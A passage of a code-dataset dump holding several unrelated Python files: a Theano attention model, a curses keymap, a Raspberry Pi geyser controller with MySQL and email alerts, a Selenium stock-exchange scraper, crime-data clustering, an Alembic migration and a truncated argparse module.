self.encode(self.x_data, self.xmask)\n self.h_enc_emb = self.approx_embedder(self.x_data)\n self.h_enc = T.concatenate([self.h_enc_basic, self.h_enc_emb], axis=2)\n [self.pt, self.ot, self.h_t, self.alpha] = self.decode()\n \n self.cost = self.build_cost(self.pt,\n self.abs_out,\n self.ymask)\n self.updates = self.compute_updates(self.cost, self.params)\n\n self.gen_h = theano.shared(value=np.zeros((2, self.h_dim), dtype='float32'), name='gen_h')\n self.gen_x = T.ivector('gen_x')\n [self.gen_pred, self.gen_ot, self.gen_alpha, self.gen_updates] = self.build_gen()\n \n def init_params(self):\n self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.word_dim, self.emb_dim), name='W_emb'+self.name))\n self.H_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_enc'+self.name))\n self.P_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_enc'+self.name))\n self.H_dec = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_dec'+self.name))\n self.P_dec = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_dec'+self.name))\n self.W = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='W_dec'+self.name))\n self.U = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='U_dec'+self.name))\n self.O_h = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='O_h_dec'+self.name))\n self.O_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='O_z_dec'+self.name))\n self.out_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.word_dim), name='out_emb'+self.name))\n self.b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='b'+self.name))\n self.b = self.b.dimshuffle('x', 'x', 0)\n self.encode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='encode_b'+self.name))\n self.decode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='decode_b'+self.name))\n\n def approx_embedder(self, x):\n return self.W_emb[x]\n\n def encode(self, x_data, mask):\n if self.test_mode:\n batch_size = 2\n else:\n batch_size = self.bs\n emb_x = self.approx_embedder(x_data)\n def encode_step(x_t, h_tm1):\n h_t = self.active(T.dot(h_tm1, self.H_enc) + \\\n T.dot(x_t, self.P_enc) + \\\n self.encode_b)\n return h_t\n h_0 = T.alloc(np.float32(0), batch_size, self.h_dim)\n h_enc, _ = theano.scan(encode_step, \\\n sequences=[emb_x], \\\n outputs_info=[h_0])\n return h_enc\n\n def decode_step(self, abs_in_t, h_tm1, h_enc, xmask, b):\n x_t = self.approx_embedder(abs_in_t)\n h_t = self.active(T.dot(h_tm1, self.H_dec) + \\\n T.dot(x_t, self.P_dec) + \\\n self.decode_b)\n tmp = T.dot(h_tm1, self.W).dimshuffle('x', 0, 1) + \\\n T.dot(h_enc, self.U)\n beta_t = T.sum(b * tmp, axis=2)\n alpha_t = T.exp(beta_t) * xmask / T.sum(T.exp(beta_t) * xmask, axis=0)\n z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n z_t = T.sum(z_tmp, axis=0)\n g_t = T.dot(T.dot(h_t, self.O_h) + T.dot(z_t, self.O_z), \\\n self.out_emb)\n p_t = SoftMax(g_t)\n o_t = p_t.argmax(axis=1)\n return [p_t, o_t, h_t, alpha_t]\n\n def build_gen(self):\n x_t = self.approx_embedder(self.gen_x)\n h_tm1 = self.gen_h\n h_enc = self.h_enc\n xmask = self.xmask\n b = self.b\n h_t = self.active(T.dot(h_tm1, self.H_dec) + \\\n T.dot(x_t, self.P_dec) + \\\n self.decode_b)\n tmp = T.dot(h_tm1, self.W).dimshuffle('x', 0, 1) + \\\n T.dot(h_enc, self.U)\n beta_t = T.sum(b * tmp, axis=2)\n beta_t2 = beta_t - T.max(beta_t)\n alpha_t = T.exp(beta_t2) * xmask / T.sum(T.exp(beta_t2) * xmask, axis=0)\n z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n z_t = T.sum(z_tmp, axis=0)\n g_t = T.dot(T.dot(h_t, self.O_h) + T.dot(z_t, self.O_z), \\\n self.out_emb)\n p_t = SoftMax(g_t)\n o_t = p_t.argmax(axis=1)\n updates = [(self.gen_h, h_t)]\n return [p_t, o_t, alpha_t, updates]\n\n def gen_reset(self):\n self.gen_h.set_value(np.zeros((2, self.h_dim), dtype='float32'))\n\n def gen_next(self, abs_in, h_enc, xmask, b):\n abs_in_emb = self.approx_embedder([abs_in, 0])\n gen_fn = self.build_gen_function()\n p_t = gen_fn(self.x_data, self.x_mask, self.gen_x)\n return p_t\n \n def decode(self):\n batch_size = self.bs\n h_enc = self.h_enc\n xmask = self.xmask\n\n h_0 = theano.shared(np.zeros((batch_size, self.h_dim), \\\n dtype='float32'), \\\n name='decode_h0')\n \n [p_t, o_t, h_t, alpha], _ = theano.scan(self.decode_step, \\\n outputs_info=[None, None, h_0, None], \\\n non_sequences=[h_enc, xmask, self.b], \\\n sequences=[self.abs_in])\n return [p_t, o_t, h_t, alpha]\n \n def build_cost(self, ot, abs_out, ymask):\n x_flatten = ot.dimshuffle(2,0,1)\n x_flatten = x_flatten.flatten(2).dimshuffle(1, 0)\n y_flatten = abs_out.flatten()\n\n cost = x_flatten[T.arange(y_flatten.shape[0]), \\\n y_flatten]\n neg_log_cost_sum = T.sum(-T.log(cost) * ymask.flatten())\n cost_res = neg_log_cost_sum\n\n self.pred = x_flatten.argmax(axis=1)\n self.acc = 1.0 * T.sum(T.eq(self.pred, y_flatten) * ymask.flatten()) / T.sum(ymask)\n return cost_res\n\n def build_train_function(self):\n if not hasattr(self, 'train_fn'):\n self.train_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.abs_in,\n self.abs_out,\n self.ymask],\n outputs=[self.cost, \\\n self.acc],\n updates=self.updates,\n name=\"train_fn\")\n return self.train_fn\n\n def build_eval_function(self):\n if not hasattr(self, 'eval_fn'):\n self.eval_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.abs_in,\n self.abs_out,\n self.ymask],\n outputs=[self.cost, \\\n self.acc],\n name=\"eval_fn\")\n return self.eval_fn\n\n def build_gen_function(self):\n if not hasattr(self, 'gen_fn'):\n self.gen_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.gen_x],\n outputs=[self.gen_pred, self.gen_ot, self.gen_alpha],\n updates=self.gen_updates,\n name=\"gen_fn\")\n return self.gen_fn\n\n def compute_updates(self, training_cost, params):\n updates = []\n \n grads = T.grad(training_cost, params)\n grads = OrderedDict(zip(params, grads))\n\n # Clip stuff\n c = numpy.float32(self.cutoff)\n clip_grads = []\n \n norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))\n normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))\n notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))\n \n for p, g in grads.items():\n clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))\n \n grads = OrderedDict(clip_grads)\n\n if self.updater == 'adagrad':\n updates = Adagrad(grads, self.lr) \n elif self.updater == 'sgd':\n raise Exception(\"Sgd not implemented!\")\n elif self.updater == 'adadelta':\n updates = Adadelta(grads)\n elif self.updater == 'rmsprop':\n updates = RMSProp(grads, self.lr)\n elif self.updater == 'adam':\n updates = Adam(grads)\n else:\n raise Exception(\"Updater not understood!\") \n\n return updates\n","sub_path":"attention_NLU/title_model32.py","file_name":"title_model32.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616465610","text":"import curses\n\ndef get_mapped_action(key, active_window):\n \"\"\"\n Specifies what should happen when a certain key is pressed. \n \"\"\"\n\n if key == ord('k') or key == curses.KEY_UP:\n return active_window.select_up\n\n elif key == ord('j') or key == curses.KEY_DOWN:\n return active_window.select_down\n\n elif key == ord('l') or key == curses.KEY_RIGHT:\n return active_window.select_right\n\n elif key == ord('h') or key == curses.KEY_LEFT:\n return active_window.select_left\n\n elif key == ord('q'):\n return None\n\n else:\n print(key)\n return None\n","sub_path":"src/taskwarrior_kanban/gui/keymap.py","file_name":"keymap.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42661779","text":"#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nimport time\nimport mysql.connector\nimport subprocess\nimport sys\nimport os\nimport glob\nimport smtplib\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(26,GPIO.OUT)\nGPIO.setup(20,GPIO.OUT)\nGPIO.setup(21,GPIO.OUT)\n\nGPIO.output(26,GPIO.HIGH)\nGPIO.output(20,GPIO.HIGH)\nGPIO.output(21,GPIO.HIGH)\n\ndbHost = 'localhost'\ndbUsername = 'pi'\ndbPassword = 'raspberry'\ndbDatabase = 'geyser_pi'\n\n\n# GLOBAL VARS\nmaxGeyserTemp = 0\nminGeyserTemp = 0\ncurrentGeyserTemp = 0\nmaxReservoirTemp = 0\nminReservoirTemp = 0\ncurrentReservoirTemp = 0\nelementIsAuto = 0\nelementIsOn = 0\npumpIsAuto = 0\npumpIsOn = 0\nholidayIsOn = 0\nscheduledTemp = 0\ndeltaTemp = 7\nautoTimeout = 0\n\n# GLOBAL COUNTERS\nsmtpSleepCounter = 300 # 5 MINUTES\nelementBackToAuto = 0\npumpBackToAuto = 0\n\n\n# RETURN A DB CONNECTION\ndef dbConnect():\n return mysql.connector.connect(\n user = dbUsername,\n password = dbPassword,\n host = dbHost,\n database = dbDatabase)\n\n\n# SWITCH THE ELEMENT ON, BUT DO NOT UPDATE THE DB\ndef elementOn():\n global holidayIsOn\n global elementIsOn\n if not holidayIsOn and geyserIsCold():\n GPIO.output(26,GPIO.LOW) \n elementIsOn = 1\n return\n\n# SWITCH THE ELEMENT ON, AND UPDATE THE DB\ndef turnElementOn():\n if not elementIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setElementOn()')\n conn.commit()\n conn.close()\n elementOn()\n return\n\n# SWITCH THE ELEMENT OFF, BUT DO NOT UPDATE THE DB\ndef elementOff():\n GPIO.output(26,GPIO.HIGH)\n global elementIsOn\n elementIsOn = 0\n return\n\n# SWITCH THE ELEMENT OFF, AND UPDATE THE DB\ndef turnElementOff():\n if elementIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setElementOff()')\n conn.commit()\n conn.close()\n elementOff()\n return\n\n# SWITCH THE PUMP ON, BUT DO NOT UPDATE THE DB\ndef pumpOn():\n GPIO.output(20,GPIO.LOW)\n global pumpIsOn\n pumpIsOn = 1\n return\n\n# SWITCH THE PUMP ON, AND UPDATE THE DB\ndef turnPumpOn():\n if not pumpIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setPumpOn()')\n conn.commit()\n conn.close() \n pumpOn()\n return\n\n# SWITCH THE PUMP OFF, BUT DO NOT UPDATE THE DB\ndef pumpOff():\n GPIO.output(20,GPIO.HIGH)\n global pumpIsOn\n pumpIsOn = 0\n return\n\n#SWITCH THE PUMP OFF, AND UPDATE THE DB\ndef turnPumpOff():\n if pumpIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setPumpOff()')\n conn.commit()\n conn.close() \n pumpOff()\n return\n\n# CHECK IF THE GEYSER TEMP IS LOWER THAN THE THRESHOLDS\n# ADDED 2 DEGREES UPWARDS VARIATION FOR SCHMIDT-TRIGGER\ndef geyserIsCold():\n global currentGeyserTemp\n global maxGeyserTemp\n return (((currentGeyserTemp + 2) < getScheduledTemp()) and (currentGeyserTemp < maxGeyserTemp))\n\n# CHECK IF THE GEYSER TEMP IS ABOVE THE MAXIMUM\ndef geyserIsTooHot():\n global currentGeyserTemp\n global maxGeyserTemp\n return currentGeyserTemp > maxGeyserTemp\n\n# CHECK IF THE GEYSER TEMP IS BELOW THE MINIMUM\ndef geyserIsTooCold():\n global currentGeyserTemp\n global minGeyserTemp\n return currentGeyserTemp < minGeyserTemp \n\n# IS THE RESERVOIR TEMP LOWER THAN THE GEYSER TEMP\ndef reservoirIsCold():\n global currentReservoirTemp\n global currentGeyserTemp\n global deltaTemp\n return (currentReservoirTemp < (currentGeyserTemp + deltaTemp))\n\n# IS THE RESERVOIR TEMP HIGHER THAN THE GEYSER TEMP\ndef reservoirIsHot():\n return not reservoirIsCold()\n\n# IS THE GEYSER TEMP LOWER THAN THE THRESHOLDS AND THE RESERVOIR TEMP IS LOWER THAN THE GEYSER TEMP\ndef canTurnElementOn():\n return (geyserIsCold() and reservoirIsCold())\n\n# IS THE RESERVOIR TEMP HIGHER THAN THE GEYSER TEMP, AND THE GEYSER TEMP LOWER THAN THE THRESHOLDS\ndef canTurnPumpOn():\n return reservoirIsHot() and geyserIsCold() \n\ndef setControls():\n\n global maxGeyserTemp\n global minGeyserTemp\n global maxReservoirTemp\n global minReservoirTemp\n global elementIsAuto\n global elementIsOn\n global pumpIsAuto\n global pumpIsOn\n global holidayIsOn\n global sheduledTemp\n global deltaTemp\n global autoTimeout\n global elementBackToAuto\n global pumpBackToAuto\n\n\n if holidayIsOn:\n turnElementOff()\n else:\n if elementIsAuto:\n if canTurnElementOn():\n turnElementOn()\n else:\n turnElementOff()\n elementBackToAuto = 0\n else:\n if elementIsOn:\n elementOn()\n else:\n elementOff()\n \n if elementBackToAuto > (autoTimeout * 60):\n elementIsAuto = 1\n elementBackToAuto = 0\n updateSystemStatus()\n else:\n elementBackToAuto = elementBackToAuto + 1\n\n if pumpIsAuto:\n if canTurnPumpOn():\n turnPumpOn()\n else:\n turnPumpOff()\n pumpBackToAuto = 0\n else:\n if pumpIsOn:\n pumpOn()\n else:\n pumpOff()\n \n if pumpBackToAuto > (autoTimeout * 60):\n pumpIsAuto = 1\n pumpBackToAuto = 0\n updateSystemStatus()\n else:\n pumpBackToAuto = pumpBackToAuto + 1\n return\n\ndef getProbeValues():\n global currentGeyserTemp\n global currentReservoirTemp\n geyserTemp = subprocess.check_output([sys.executable, \"/home/pi/GeyserPi/Python/getGeyserTemp.py\", \"34\"])\n reservoirTemp = subprocess.check_output([sys.executable, \"/home/pi/GeyserPi/Python/getReservoirTemp.py\", \"34\"])\n currentGeyserTemp = float(geyserTemp)\n currentReservoirTemp = float(reservoirTemp)\n return\n\ndef getScheduledTemp():\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('select temperature from temperature_schedule where `day` = dayofweek(now()) and `hour` = hour(now())') \n conf = cur.fetchone() \n conn.close()\n return conf[0]\n\n\ndef getSystemStatus():\n \n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('select element_auto, element_on, pump_auto, pump_on, holiday_on, geyser_max_temp, reservoir_min_temp, delta_temp, auto_timeout, geyser_min_temp from system_config') \n conf = cur.fetchone() \n conn.close()\n \n global maxGeyserTemp\n global minGeyserTemp\n global maxReservoirTemp\n global minReservoirTemp\n global elementIsAuto\n global elementIsOn\n global pumpIsAuto\n global pumpIsOn\n global holidayIsOn\n global deltaTemp\n global autoTimeout\n \n maxGeyserTemp = conf[5]\n minGeyserTemp = conf[9]\n maxReservoirTemp = 0\n minReservoirTemp = conf[6]\n elementIsAuto = conf[0]\n elementIsOn = conf[1]\n pumpIsAuto = conf[2]\n pumpIsOn = conf[3]\n holidayIsOn = conf[4]\n deltaTemp = conf[7]\n autoTimeout = conf[8]\n \n return\n\ndef updateSystemStatus():\n global elementIsOn\n global pumpIsOn\n global elementIsAuto\n global pumpIsAuto\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('update system_config set element_on = ' + str(elementIsOn) + ', pump_on = ' + str(pumpIsOn) + ', element_auto = ' + str(elementIsAuto) + ', pump_auto = ' + str(pumpIsAuto) + ' where id = 0')\n conn.commit()\n conn.close()\n\ndef sendEmail(message):\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('select smtp_host, smtp_port, smtp_username, smtp_password, smtp_from_email, smtp_from_name, smtp_recipient_email from system_config') \n conf = cur.fetchone() \n conn.close()\n\n smtpHost = conf[0]\n smtpPort = conf[1]\n smtpUsername = conf[2]\n smtpPassword = conf[3]\n smtpFromEmail = conf[4]\n smtpFromName = conf[5]\n smtpRecipientEmail = conf[6]\n\n smtp = smtplib.SMTP(smtpHost + ':' + smtpPort)\n smtp.starttls()\n smtp.login(smtpUsername,smtpPassword)\n try:\n smtp.sendmail(smtpFromEmail, smtpRecipientEmail, message)\n except:\n print('SMTP Error')\n smtp.quit()\n\n# SEND EMAIL NOTIFICATIONS, ONLY EVERY 5 MINUTES\ndef sendEmailNotifications():\n global smtpSleepCounter\n\n # WHEN THE GEYSER IS ABOVE THE MAXIMUM\n if geyserIsTooHot():\n if smtpSleepCounter >= 300:\n sendEmail('The geyser has overheated')\n print('hot', smtpSleepCounter)\n smtpSleepCounter = smtpSleepCounter + 1\n \n # WHEN THE GEYSER IS BELOW THE MINIMUM\n if geyserIsTooCold():\n print('cold')\n if smtpSleepCounter >= 300:\n sendEmail('The geyser is too cold')\n print('cold', smtpSleepCounter)\n smtpSleepCounter = smtpSleepCounter + 1\n\n if smtpSleepCounter > 300:\n smtpSleepCounter = 0\n\n# INITIALLY WAIT 3 SECONDS AFTER STARTUP FOR CONNECTION TO ESTABLISH ETC.\ntime.sleep(10)\n\n# SEND A NOTIFICATION WHEN THE SYSTEM STARTS\nsendEmail('GeyserPi Started')\n\nwhile True:\n getProbeValues()\n getSystemStatus()\n setControls()\n sendEmailNotifications()\n time.sleep(0)\n\n","sub_path":"Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"252868210","text":"import pickle\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport csv\n\ndriver = webdriver.Chrome()\n\ninitial_url = 'https://www.bseindia.com/corporates/List_Scrips.aspx'\ndriver.get(initial_url)\ntime.sleep(4)\n\nsegment = '//*[@id=\"ContentPlaceHolder1_ddSegment\"]'\ndriver.find_element_by_xpath(segment).send_keys('Equity')\n\nstatus = '//*[@id=\"ContentPlaceHolder1_ddlStatus\"]'\ndriver.find_element_by_xpath(status).send_keys('Active')\n\n\nclick_button = '//*[@id= \"ContentPlaceHolder1_btnSubmit\"]'\ndriver.find_element_by_xpath(click_button).click()\n\n\ndef process_html(html_content):\n code = []\n name = []\n soup = BeautifulSoup(html_content, 'html.parser')\n table = soup.find('table', id=\"ContentPlaceHolder1_gvData\")\n # class = \"TTRow_left\"\n for link in table.find_all('tr'):\n i = 0\n security_code = 0\n security_name = ''\n for ele in link.find_all('td', {\"class\": \"TTRow_left\"}):\n i += 1\n if(i == 1):\n security_code = ele.text\n if(i == 3):\n security_name = ele.text\n break\n if(security_code != 0 and security_name != ''):\n code.append(security_code)\n name.append(security_name)\n return code, name\n\n\nsecurity_code_details = []\nsecurity_name_details = []\nfor i in range(17):\n # Write logic to extract first page details\n # Extract first page logic here\n if(i == 16):\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n for k in range(9, 13):\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n k)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n # Extract logic here\n time.sleep(2)\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"---------------------------------------------\")\n else:\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"--------------------------------------------------------\")\n for j in range(2, 14):\n if(i == 0 and j == 11):\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n j)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n time.sleep(2)\n print(\"hello\")\n break\n elif(i != 0 and j in [2, 3]):\n continue\n else:\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n j)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n # Extract logic here\n time.sleep(2)\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"---------------------------------------------\")\n\ndict_companies = {}\nfor i in range(len(security_code_details)):\n dict_companies[security_code_details[i]] = security_name_details[i]\n\nfor i in dict_companies:\n print(i, dict_companies[i])\n\nwith open('companies.pickle', 'wb') as handle:\n pickle.dump(dict_companies, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('companies_data.csv', 'w') as f:\n for key in dict_companies.keys():\n f.write(\"%s, %s\\n\" % (key, dict_companies[key]))\n","sub_path":"DADV/BSE/scrap_company_details.py","file_name":"scrap_company_details.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85654626","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 2 14:12:03 2018\r\n\r\n@author: Riven\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import decomposition\r\nfrom sklearn import datasets\r\nfrom sklearn.cluster import KMeans,DBSCAN,\tAgglomerativeClustering\r\nfrom sklearn import preprocessing\r\nimport pylab as pl\r\nfrom sklearn import decomposition\r\nfrom pprint import pprint\r\nfrom sklearn.metrics import calinski_harabaz_score\r\nimport argparse\r\n\r\n\r\nfilepath = './dataset/crime2017_preprocessed.csv'\r\n\r\n\r\ndef getArguments():\r\n # get and parse command line arguments\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n '-f', type=str, default=filepath, help='the file path')\r\n return parser.parse_args()\r\n\r\n\r\n\r\n\r\ndef NormalizeData():\r\n fixData=pd.concat([myData['CCN'], myData['SHIFT'], myData['METHOD'], myData['OFFENSE'], myData['XBLOCK'], myData['YBLOCK'],myData['WARD'],myData['DISTRICT'],myData['NEIGHBORHOOD_CLUSTER'],myData['CENSUS_TRACT'],myData['VOTING_PRECINCT'],myData['LATITUDE'],myData['LONGITUDE'],myData['PSA_bin']], \r\n axis=1, keys=['CCN', 'SHIFT', 'METHOD', 'OFFENSE', 'XBLOCK','YBLOCK','WARD','DISTRICT','NEIGHBORHOOD_CLUSTER','CENSUS_TRACT','VOTING_PRECINCT','LATITUDE','LONGITUDE','PSA_bin'])\r\n x = fixData.values #returns a numpy array\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n x_scaled = min_max_scaler.fit_transform(x)\r\n normalizedDataFrame = pd.DataFrame(x_scaled)\r\n \r\n return normalizedDataFrame\r\n\r\n\r\n#K-Means\r\ndef KmeansClustering():\r\n normalizedDataFrame = NormalizeData()\r\n #Let k = 5\r\n k = 5\r\n kmeans = KMeans(n_clusters=k)\r\n cluster_labels = kmeans.fit_predict(normalizedDataFrame)\r\n pprint(\"KMeans: K = \"+str(k))\r\n pprint(cluster_labels)\r\n\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n print(\"For n_clusters =\", k, \"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/kmeans_pca.png')\r\n plt.show()\r\n\r\n \r\n\r\n#Agglomerative Clustering\r\ndef Agglomerative():\r\n normalizedDataFrame = NormalizeData()\r\n #Let k = 5\r\n k = 5\r\n Agglomerative = AgglomerativeClustering(n_clusters=k)\r\n cluster_labels = \tAgglomerative.fit_predict(normalizedDataFrame)\r\n pprint(\"AgglomerativeClustering: K = \"+str(k))\r\n pprint(cluster_labels)\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n\r\n print(\"For n_clusters =\", k, \"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/agglomerative_pca.png')\r\n plt.show()\r\n\r\n\r\n#DBScan\r\ndef DBScan():\r\n normalizedDataFrame = NormalizeData()\r\n #normalizedDataFrame= normalizedDataFrame.sample(frac=0.2, replace=False,axis=0)\r\n #print(normalizedDataFrame)\r\n \r\n dbscan = DBSCAN(algorithm='auto', eps=0.2, leaf_size=30, metric='euclidean',\r\n min_samples=10, n_jobs=1, p=None)\r\n cluster_labels = dbscan.fit_predict(normalizedDataFrame)\r\n pprint(\"DBSCAN:\")\r\n pprint(cluster_labels)\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n print(\"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/dbscan_pca.png')\r\n plt.show()\r\n\r\n\r\n\r\n\r\n \r\n \r\nif __name__==\"__main__\":\r\n args = getArguments()\r\n myData = pd.read_csv(args.f, sep=',', encoding='latin1')\r\n myData = myData.drop(['REPORT_DAT','BLOCK','BLOCK_GROUP','START_DATE','END_DATE','ANC','PSA'],axis = 1)\r\n KmeansClustering()\r\n Agglomerative()\r\n DBScan()","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"314609424","text":"\"\"\"empty message\n\nRevision ID: ed02b69c4934\nRevises: b899311a97ce\nCreate Date: 2020-04-12 13:25:13.703744\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'ed02b69c4934'\ndown_revision = 'b899311a97ce'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('state_results', 'dateChecked',\n existing_type=mysql.DATETIME(),\n type_=sa.String(length=50),\n existing_nullable=True)\n op.alter_column('state_results', 'dateModified',\n existing_type=mysql.DATETIME(),\n type_=sa.String(length=50),\n existing_nullable=True)\n op.alter_column('users', 'birth',\n existing_type=sa.DATE(),\n type_=sa.DateTime(),\n existing_nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'birth',\n existing_type=sa.DateTime(),\n type_=sa.DATE(),\n existing_nullable=True)\n op.alter_column('state_results', 'dateModified',\n existing_type=sa.String(length=50),\n type_=mysql.DATETIME(),\n existing_nullable=True)\n op.alter_column('state_results', 'dateChecked',\n existing_type=sa.String(length=50),\n type_=mysql.DATETIME(),\n existing_nullable=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed02b69c4934_.py","file_name":"ed02b69c4934_.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561812738","text":"import argparse\nimport sys\nimport os\n\n\ndef add_general_arguments(parser):\n group = parser.add_argument_group('General arguments')\n group.add_argument(\n '--cryodrgn', action='store_true', help='Use latent representations learned by cryoDRGN.'\n )\n group.add_argument(\n '--cryosparc', action='store_true', help='Use latent representations calculated by cryoSPARC 3D variability analysis.'\n )\n group.add_argument(\n '--z-file', type=str, help='Required for --cryodrgn. The pickled file containing the learned latent representation data (z.pkl).'\n )\n group.add_argument(\n '--metadata', type=str, help='Required for --cryodrgn. If a RELION refinement was the input for cryoDRGN, specify the star file here. Else if a cryoSPARC refinement was the input for cryoDRGN, specify the .csg result group file here (e.g. __particles.csg)'\n )\n group.add_argument(\n '--threedvar-csg', help='Required for --cryosparc. The 3D variability job .csg result group file. (e.g. __particles.csg)'\n )\n group.add_argument(\n '--threedvar-num-components', default=-1, type=int, help='Option for --cryosparc. How many variability components to use. For example, \"--3dvar-num-components 3\" uses the component 0, 1 and 2 for cluster analysis. By default use all the components.'\n )\n group.add_argument(\n '--random-state', type=int, help='Random state (random seed value).'\n )\n group.add_argument(\n '--output-dir', type=str, help='Output directory. By default the current directory.'\n )\n group.add_argument(\n '--output-file-rootname', 